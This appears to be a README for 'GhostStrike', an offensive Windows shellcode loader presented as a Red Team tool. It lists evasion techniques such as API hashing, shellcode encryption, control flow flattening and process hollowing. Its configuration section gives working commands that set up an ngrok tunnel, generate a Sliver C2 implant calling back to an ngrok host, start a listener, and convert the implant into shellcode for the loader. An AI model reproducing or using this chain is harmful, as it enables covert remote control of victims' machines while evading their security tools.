GhostStrike is an advanced cybersecurity tool designed for Red Team operations, featuring sophisticated techniques to evade detection and perform process hollowing on Windows systems.
Features
- Dynamic API Resolution: Utilizes a custom hash-based method to dynamically resolve Windows APIs, avoiding detection by signature-based security tools.
- Base64 Encoding/Decoding: Encodes and decodes shellcode to obscure its presence in memory, making it more difficult for static analysis tools to detect.
- Cryptographic Key Generation: Generates secure cryptographic keys using Windows Cryptography APIs to encrypt and decrypt shellcode, adding an extra layer of protection.
- XOR Encryption/Decryption: Simple but effective XOR-based encryption to protect the shellcode during its injection process.
- Control Flow Flattening: Implements control flow flattening to obfuscate the execution path, complicating analysis by both static and dynamic analysis tools.
- Process Hollowing: Injects encrypted shellcode into a legitimate Windows process, allowing it to execute covertly without raising suspicions.
Configuration
You can configure GhostStrike with the following steps:
- Create Ngrok Service:
ngrok tcp 443 - Generate Sliver C2 Implant:
generate --mtls x.tcp.ngrok.io --save YourFile.exe - Create Listener:
mtls --lhost 0.0.0.0 --lport 443 - Convert to .bin:
./donut -i /home/YourUser/YourFile.exe -a 2 -f 1 -o /home/YourUser/YourFile.bin - Convert to C++ Shellcode:
xxd -i YourFile.bin > YourFile.h - Import YourFile.h to this code
- Compile and enjoy! 🚀
Requirements
- C++ Compiler: Any modern C++ compiler, such as
g++,clang++, or Visual Studio, is sufficient to compile the code.
No additional dependencies are needed to build GhostStrike. Simply compile the source code with your preferred C++ compiler, and you’re ready to go!
